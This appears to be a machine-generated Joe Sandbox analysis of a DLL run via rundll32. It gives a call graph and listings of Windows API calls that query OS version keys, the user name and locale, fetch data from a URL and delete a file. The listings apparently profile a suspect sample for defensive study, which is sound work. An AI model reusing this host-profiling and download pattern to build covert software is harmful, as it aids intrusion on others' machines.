11347->11348 11349 6c9dba6e 11348->11349 11350 6c9db0a0 83 API calls 11349->11350 11351 6c9dba7c Sleep Sleep Sleep 11350->11351 11352 6c9dbaaf 11351->11352 11353 6c9db348 129 API calls 11352->11353 11354 6c9dbaef Sleep Sleep 11353->11354 11355 6c9dbb0e 11354->11355 11356 6c9db600 26 API calls 11355->11356 11357 6c9dbb7c Sleep 11356->11357 11359 6c9dbbb0 11357->11359 11360 6c9db404 DeleteFileW 11359->11360 11361 6c9dbbc8 11360->11361 11363 6c9db30f 11362->11363 11364 6c9db31d GetUserNameW 11363->11364 11365 6c9db33e 11364->11365 11367 6c9db327 11364->11367 11402 6c7f304c GetLastError 11365->11402 11367->11310 11369 6c9db7ff ShowWindow 11368->11369 11370 6c9db80a 11368->11370 11369->11370 11371 6c9db784 11370->11371 11432 6c7c7128 11371->11432 11373 6c9db797 GetSystemDefaultLangID VerLanguageNameW 11374 6c9db7c3 11373->11374 11374->11314 11376 6c7cabd2 11375->11376 11377 6c7cabe3 11375->11377 11434 6c7cab24 11376->11434 11378 6c7cabec GetCurrentThreadId 11377->11378 11379 6c7cabf9 11377->11379 11378->11379 11382 6c7c71ec 8 API calls 11379->11382 11383 6c7cac93 FreeLibrary 11379->11383 11384 6c7cacbb 11379->11384 11381 6c7cabdc 11381->11377 11382->11379 11383->11379 11385 6c7cacca ExitProcess 11384->11385 11386 6c7cacc4 11384->11386 11386->11385 11388 6c7f1e6f 11387->11388 11393 6c7f1f00 11388->11393 11401 6c7f1e8f 11388->11401 11442 6c7e75e8 11388->11442 11392 6c7f1ecd 11392->11393 11396 6c7e75e8 CharUpperBuffW 11392->11396 11397 6c7f1ffb 11393->11397 11400 6c7f1f5f 11393->11400 11395 6c7f247b 11396->11393 11397->11401 11453 6c7ce254 11397->11453 11400->11401 11450 6c7f5fa4 11400->11450 11456 6c7ce378 11401->11456 11405 6c7f305c 11402->11405 11406 6c7f307f 11405->11406 11407 6c7f30c0 11405->11407 11413 6c7ee5b8 11406->11413 11418 6c7f0074 11407->11418 11410 6c7f30bb 11414 6c7ee5cf FormatMessageW 11413->11414 11415 6c7ee5c9 11413->11415 11416 6c7ee5f1 11414->11416 11415->11414 11417 6c7ee617 LocalFree 11416->11417 11419 6c7f007b 11418->11419 11422 6c7d17ac 11419->11422 11421 6c7f0093 11421->11410 11423 6c7d17b4 11422->11423 11423->11423 11426 6c7d17d9 11423->11426 11427 6c7cead0 11423->11427 11425 6c7d1805 LoadStringW 11425->11426 11426->11421 11428 6c7ceafd 11427->11428 11429 6c7ceade 11427->11429 11428->11425 11429->11428 11430 6c7cea88 63 API calls 11429->11430 11431 6c7ceaf4 11430->11431 11431->11425 11433 6c7c712c 11432->11433 11433->11373 11435 6c7cab2e GetStdHandle WriteFile 11434->11435 11436 6c7cab8b 11434->11436 11440 6c7cb7f4 11435->11440 11436->11381 11441 6c7cab7b GetStdHandle WriteFile 11440->11441 11441->11381 11443 6c7e75f2 11442->11443 11444 6c7e7607 CharUpperBuffW 11443->11444 11445 6c7e7610 11443->11445 11444->11445 11446 6c7e7614 11445->11446 11447 6c7e761e 11446->11447 11448 6c7e763c 11447->11448 11449 6c7e7633 CharLowerBuffW 11447->11449 11448->11392 11449->11448 11460 6c7f6120 11450->11460 11473 6c7cdf8c 11453->11473 11457 6c7ce37e 11456->11457 11459 6c7ce3af 11456->11459 11457->11459 11649 6c7ccb24 11457->11649 11459->11395 11463 6c7f5fc8 11460->11463 11464 6c7f5fda 11463->11464 11465 6c7f5ff3 11463->11465 11469 6c7f607c 11464->11469 11467 6c7f607c CompareStringW 11465->11467 11468 6c7f5fc1 11467->11468 11468->11400 11470 6c7f6095 11469->11470 11471 6c7f60ef CompareStringW 11470->11471 11472 6c7f60b7 11470->11472 11471->11472 11472->11468 11474 6c7cdfaf 11473->11474 11476 6c7cdfca 11473->11476 11475 6c7ce378 16 API calls 11474->11475 11480 6c7cdfc5 11475->11480 11477 6c7ce037 11476->11477 11479 6c7ce0ff 11476->11479 11487 6c7ce09b 11477->11487 11488 6c7cdf48 11477->11488 11484 6c7ce145 11479->11484 11505 6c7cd504 11479->11505 11480->11397 11482 6c7cdf8c 60 API calls 11482->11487 11483 6c7ce378 16 API calls 11483->11487 11484->11483 11485 6c7ce04f 11485->11487 11498 6c7cd3d8 11485->11498 11487->11480 11487->11482 11509 6c7d2528 11488->11509 11490 6c7cdf51 11491 6c7cdf59 11490->11491 11493 6c7cdf67 11490->11493 11492 6c7d2528 11 API calls 11491->11492 11494 6c7cdf5e 11492->11494 11495 6c7d2528 11 API calls 11493->11495 11494->11485 11496 6c7cdf75 11495->11496 11497 6c7d2528 11 API calls 11496->11497 11497->11494 11499 6c7cd3f4 11498->11499 11500 6c7cd43c 11498->11500 11499->11500 11501 6c7cd4a5 11499->11501 11502 6c7cd476 11499->11502 11500->11487 11501->11500 11534 6c7cd058 11501->11534 11502->11500 11503 6c7cd3d8 49 API calls 11502->11503 11503->11502 11506 6c7cd50d 11505->11506 11507 6c7cd515 11505->11507 11628 6c7cd2b4 11506->11628 11507->11484 11510 6c7d255d TlsGetValue 11509->11510 11511 6c7d2537 11509->11511 11512 6c7d2567 11510->11512 11513 6c7d2542 11510->11513 11511->11490 11512->11490 11517 6c7d245c 11513->11517 11516 6c7d2556 11516->11490 11518 6c7d2462 11517->11518 11519 6c7d247b 11518->11519 11526 6c7d2490 TlsGetValue 11518->11526 11528 6c7cacf8 11518->11528 11527 6c7d2448 LocalAlloc 11519->11527 11522 6c7d2482 11523 6c7d2486 11522->11523 11524 6c7d2492 TlsSetValue 11522->11524 11525 6c7cacf8 10 API calls 11523->11525 11524->11526 11525->11526 11526->11516 11527->11522 11531 6c7cacec 11528->11531 11532 6c7cabbc 11 API calls 11531->11532 11533 6c7cacf6 11532->11533 11533->11519 11535 6c7cd097 11534->11535 11536 6c7cd075 11534->11536 11535->11536 11537 6c7cd3d8 49 API calls 11535->11537 11540 6c7cd058 49 API calls 11535->11540 11543 6c7ce378 16 API calls 11535->11543 11545 6c7cb2f0 11535->11545 11555 6c7caed4 11535->11555 11558 6c7d136c 11535->11558 11563 6c7d1340 11535->11563 11567 6c7ce3bc 11535->11567 11536->11501 11537->11535 11540->11535 11543->11535 11546 6c7cb2f4 11545->11546 11547 6c7cb317 11545->11547 11548 6c7caed4 11546->11548 11551 6c7cb307 SysReAllocStringLen 11546->11551 11547->11535 11549 6c7caee8 11548->11549 11550 6c7caeda SysFreeString 11548->11550 11549->11535 11550->11549 11551->11547 11552 6c7cae6c 11551->11552 11553 6c7cafbc 11552->11553 11554 6c7cafa6 SysAllocStringLen 11552->11554 11553->11535 11554->11552 11554->11553 11556 6c7caee8 11555->11556 11557 6c7caeda SysFreeString 11555->11557 11556->11535 11557->11556 11559 6c7d1340 14 API calls 11558->11559 11560 6c7d1379 11559->11560 11571 6c7d12d8 11560->11571 11564 6c7d134b 11563->11564 11565 6c7d1365 11563->11565 11618 6c7d1310 11564->11618 11565->11535 11569 6c7ce3c0 11567->11569 11568 6c7ce3e9 11568->11535 11569->11568 11570 6c7ce378 16 API calls 11569->11570 11570->11568 11572 6c7d1309 11571->11572 11573 6c7d12e3 11571->11573 11572->11535 11575 6c7d0efc 11573->11575 11576 6c7d0f18 11575->11576 11577 6c7d0f20 11575->11577 11587 6c7d0d98 11576->11587 11599 6c7d0bb8 11577->11599 11580 6c7d0f49 11586 6c7d0f8e 11580->11586 11603 6c7d0cc0 11580->11603 11614 6c7d0c20 11586->11614 11588 6c7d0db1 11587->11588 11597 6c7d0e3a 11587->11597 11589 6c7d0dd8 11588->11589 11590 6c7c98e0 15 API calls 11588->11590 11591 6c7c9a54 13 API calls 11589->11591 11593 6c7d0dbf 11590->11593 11592 6c7d0de6 11591->11592 11596 6c7d0ba4 15 API calls 11592->11596 11598 6c7d0e18 11592->11598 11593->11589 11595 6c7c9958 10 API calls 11593->11595 11594 6c7c9bec GetCurrentThreadId Sleep 11594->11597 11595->11589 11596->11592 11597->11577 11598->11594 11600 6c7d0bcb 11599->11600 11601 6c7d0bc1 11599->11601 11600->11580 11602 6c7c9a54 13 API calls 11601->11602 11602->11600 11604 6c7d0cc8 11603->11604 11605 6c7d0cd1 11604->11605 11606 6c7d079c 15 API calls 11604->11606 11607 6c7d0a74 11605->11607 11606->11605 11608 6c7d0a84 11607->11608 11609 6c7d0a8d 11608->11609 11611 6c7d0a9c 11608->11611 11610 6c7d0704 25 API calls 11609->11610 11613 6c7d0a9a 11610->11613 11612 6c7d0704 25 API calls 11611->11612 11611->11613 11612->11613 11613->11586 11615 6c7d0c29 11614->11615 11616 6c7d0c30 11614->11616 11617 6c7c9bec GetCurrentThreadId Sleep 11615->11617 11617->11616 11619 6c7d1314 11618->11619 11620 6c7d1321 11618->11620 11622 6c7d0fd8 11619->11622 11620->11565 11623 6c7d1062 11622->11623 11624 6c7d0ff8 11622->11624 11623->11620 11625 6c7d0bb8 13 API calls 11624->11625 11626 6c7d1021 11625->11626 11627 6c7d0c20 2 API calls 11626->11627 11627->11623 11629 6c7cd2c9 11628->11629 11637 6c7cd305 11628->11637 11630 6c7cd2ce 11629->11630 11631 6c7cd327 11629->11631 11633 6c7cd366 11630->11633 11634 6c7cd2e1 11630->11634 11630->11637 11632 6c7cb2f0 3 API calls 11631->11632 11631->11637 11632->11631 11633->11637 11638 6c7cd2b4 49 API calls 11633->11638 11635 6c7cd2fc 11634->11635 11634->11637 11639 6c7cd3ba 11634->11639 11635->11637 11641 6c7cce8c 11635->11641 11637->11507 11638->11633 11639->11637 11640 6c7ce3bc 16 API calls 11639->11640 11640->11639 11645 6c7ccea9 11641->11645 11642 6c7cceb9 11642->11635 11643 6c7d136c 44 API calls 11643->11645 11644 6c7cb2f0 3 API calls 11644->11645 11645->11642 11645->11643 11645->11644 11646 6c7cd2b4 49 API calls 11645->11646 11647 6c7cce8c 49 API calls 11645->11647 11648 6c7ce3bc 16 API calls 11645->11648 11646->11645 11647->11645 11648->11645 11650 6c7ccb43 11649->11650 11651 6c7ccb90 11649->11651 11650->11651 11652 6c7ccba0 11650->11652 11657 6c7ccce5 11650->11657 11658 6c7ccbda 11650->11658 11659 6c7ccc3c 11650->11659 11651->11459 11660 6c7caf5c 11652->11660 11654 6c7ce378 16 API calls 11654->11657 11655 6c7ccb24 16 API calls 11655->11658 11657->11651 11657->11654 11658->11651 11658->11655 11659->11651 11664 6c7cc6e4 11659->11664 11662 6c7caf62 11660->11662 11661 6c7caf68 SysFreeString 11661->11662 11662->11661 11663 6c7caf7a 11662->11663 11663->11651 11667 6c7cc714 11664->11667 11665 6c7cc71f 11665->11659 11666 6c7cc79e 11666->11665 11669 6c7ccb24 16 API calls 11666->11669 11670 6c7cc6e4 16 API calls 11666->11670 11671 6c7caed4 SysFreeString 11666->11671 11672 6c7ce378 16 API calls 11666->11672 11667->11665 11667->11666 11668 6c7d1340 14 API calls 11667->11668 11668->11667 11669->11666 11670->11666 11671->11666 11672->11666

                    Executed Functions

                    Function 6C7F1208 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 129registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetVersionExW.KERNEL32(00000114,?,6C7F1470,00000000,6C7F148A,?,?,6C7F14A2,6C941DF7,0000FFC6,6C93D488,6C94211C,0000FFC6,00000000,?), ref: 6C7F1222
                    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,?,00000114,?,6C7F1470,00000000,6C7F148A,?,?,6C7F14A2,6C941DF7,0000FFC6,6C93D488), ref: 6C7F1283
                    • RegQueryValueExW.ADVAPI32(?,DisplayVersion,00000000,00000000,00000000,?,00000000,6C7F139A,?,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,?,00000114), ref: 6C7F12B1
                    • RegQueryValueExW.ADVAPI32(?,DisplayVersion,00000000,00000000,00000000,?,?,DisplayVersion,00000000,00000000,00000000,?,00000000,6C7F139A,?,80000002), ref: 6C7F12F3
                    • RegQueryValueExW.ADVAPI32(?,ReleaseId,00000000,00000000,00000000,?,?,DisplayVersion,00000000,00000000,00000000,?,00000000,6C7F139A,?,80000002), ref: 6C7F130D
                    • RegQueryValueExW.ADVAPI32(?,ReleaseId,00000000,00000000,00000000,?,?,ReleaseId,00000000,00000000,00000000,?,?,DisplayVersion,00000000,00000000), ref: 6C7F134F
                    • RegQueryValueExW.ADVAPI32(?,UBR,00000000,00000000,6CD5E960,?,?,ReleaseId,00000000,00000000,00000000,?,?,DisplayVersion,00000000,00000000), ref: 6C7F1371
                    • RegCloseKey.ADVAPI32(?,6C7F13A1,00000000,6CD5E960,?,?,ReleaseId,00000000,00000000,00000000,?,?,DisplayVersion,00000000,00000000,00000000), ref: 6C7F1392
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: QueryValue$CloseOpenVersion
                    • String ID: DisplayVersion$ReleaseId$SOFTWARE\Microsoft\Windows NT\CurrentVersion$UBR
                    • API String ID: 4211099411-3678894217
                    • Opcode ID: 3bcc383f78f13b47d034871eeeb772c312a1d10f7bd1735541fbe5a01f59efb8
                    • Instruction ID: 5c2e7be4b19e6f7e83a5398dc20d3b48d04d4edd71854693056ac8ac4463091b
                    • Opcode Fuzzy Hash: 3bcc383f78f13b47d034871eeeb772c312a1d10f7bd1735541fbe5a01f59efb8
                    • Instruction Fuzzy Hash: 934161B5B00209AFEB50DBA4CE89FDE77BCAB45304F504461E610E6F84D774EA498B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9DB4D4 Relevance: 7.6, APIs: 5, Instructions: 83networkfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 6C9BE454: GetWindowTextW.USER32(?,?,00000100), ref: 6C9BE483
                    • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6C9DB523
                    • InternetOpenUrlW.WININET(?,00000000,00000000,00000000,00000000,00000000), ref: 6C9DB540
                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 6C9DB58A
                    • InternetCloseHandle.WININET(00000000), ref: 6C9DB5C8
                    • InternetCloseHandle.WININET(?), ref: 6C9DB5D1
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileReadTextWindow
                    • String ID:
                    • API String ID: 329204902-0
                    • Opcode ID: dd5ebac761f44139a36aed484155586a5801041106caffc0cc94a0863f76744c
                    • Instruction ID: 8bc03c334d822c5a623dbf76c730db40ef36de23a4530574d5a1ba920ad03e7c
                    • Opcode Fuzzy Hash: dd5ebac761f44139a36aed484155586a5801041106caffc0cc94a0863f76744c
                    • Instruction Fuzzy Hash: BC313270A00609AFDB10DBA4CD49FDEB7B9AF44308F1149A5E504F7690DB71BA88CB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CFB50 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,6C7CFC12,?,?), ref: 6C7CFB82
                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,6C7CFC12,?,?), ref: 6C7CFB8B
                      • Part of subcall function 6C7CF9F8: FindFirstFileW.KERNEL32(00000000,?,00000000,6C7CFA58,?,?,?,6C7CFAFE,?,00000000,6C7CFB40,?,6C7E1FB8,?,?), ref: 6C7CFA2B
                      • Part of subcall function 6C7CF9F8: FindClose.KERNEL32(00000000,00000000,?,00000000,6C7CFA58,?,?,?,6C7CFAFE,?,00000000,6C7CFB40,?,6C7E1FB8,?,?), ref: 6C7CFA3B
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                    • String ID:
                    • API String ID: 3216391948-0
                    • Opcode ID: 7272ecba81521d9adea434b9c7424c82d1b0dcc826d28bf60e03c362f2b67fa4
                    • Instruction ID: 0010f482c5dfe78c16a9728367708a5fb0a573d5ccb1f4468455537f2a6915de
                    • Opcode Fuzzy Hash: 7272ecba81521d9adea434b9c7424c82d1b0dcc826d28bf60e03c362f2b67fa4
                    • Instruction Fuzzy Hash: 4A118E70B0420A9FDB04DFA4DA99AEDB3B8EF49304F504475A410E7B50DB34AE088766
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CF9F8 Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,6C7CFA58,?,?,?,6C7CFAFE,?,00000000,6C7CFB40,?,6C7E1FB8,?,?), ref: 6C7CFA2B
                    • FindClose.KERNEL32(00000000,00000000,?,00000000,6C7CFA58,?,?,?,6C7CFAFE,?,00000000,6C7CFB40,?,6C7E1FB8,?,?), ref: 6C7CFA3B
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: cf5105be8046e8ef3f88c33bb163873910c608b188fc1a9f8f5277a341d01829
                    • Instruction ID: 9328e3d22a66f6f9470fdc6d9c576a67e0196bd477cf2277e2482e66f59f6883
                    • Opcode Fuzzy Hash: cf5105be8046e8ef3f88c33bb163873910c608b188fc1a9f8f5277a341d01829
                    • Instruction Fuzzy Hash: B0F0E971600A0AAFC750DB78DE5988EB7ECFB493287600971E414E3A50EB319F049612
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9DB2F4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • GetUserNameW.ADVAPI32(00000000,00000400), ref: 6C9DB31E
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 3f8a608f9548cf6559d0663c82cd03136b55902c2bc75a67c6dc93685650bb8b
                    • Instruction ID: 0998ace4a1fa2387f3c6aaada3da80e3147649c1a1f8639fc938a81861a4df17
                    • Opcode Fuzzy Hash: 3f8a608f9548cf6559d0663c82cd03136b55902c2bc75a67c6dc93685650bb8b
                    • Instruction Fuzzy Hash: 1FF0F830A0550AEFDB10DBE8C68D9DEB7B9AB00318F2041A1A414A7B54DB30FB499B56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CF614 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 178registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,6C7CF83C,?,?,?), ref: 6C7CF653
                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,00020019,?,00000000,6C7CF83C,?,?,?), ref: 6C7CF69C
                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,00020019,?,80000001,Software\Embarcadero\Locales,00000000,00020019,?,00000000,6C7CF83C,?,?,?), ref: 6C7CF6BE
                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,00020019,?,80000002,Software\Embarcadero\Locales,00000000,00020019,?,80000001,Software\Embarcadero\Locales,00000000,00020019,?,00000000), ref: 6C7CF6DC
                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,00020019,?,80000001,Software\CodeGear\Locales,00000000,00020019,?,80000002,Software\Embarcadero\Locales,00000000,00020019,?,80000001), ref: 6C7CF6FA
                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,00020019,?,80000002,Software\CodeGear\Locales,00000000,00020019,?,80000001,Software\CodeGear\Locales,00000000,00020019,?,80000002), ref: 6C7CF718
                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,00020019,?,80000001,Software\Borland\Locales,00000000,00020019,?,80000002,Software\CodeGear\Locales,00000000,00020019,?,80000001), ref: 6C7CF736
                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,6C7CF818,?,80000001,Software\Embarcadero\Locales,00000000,00020019,?,00000000,6C7CF83C), ref: 6C7CF770
                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,?,00000000,6C7CF818,?,80000001), ref: 6C7CF795
                    • RegCloseKey.ADVAPI32(?,6C7CF81F,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,6C7CF818,?,80000001,Software\Embarcadero\Locales), ref: 6C7CF810
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
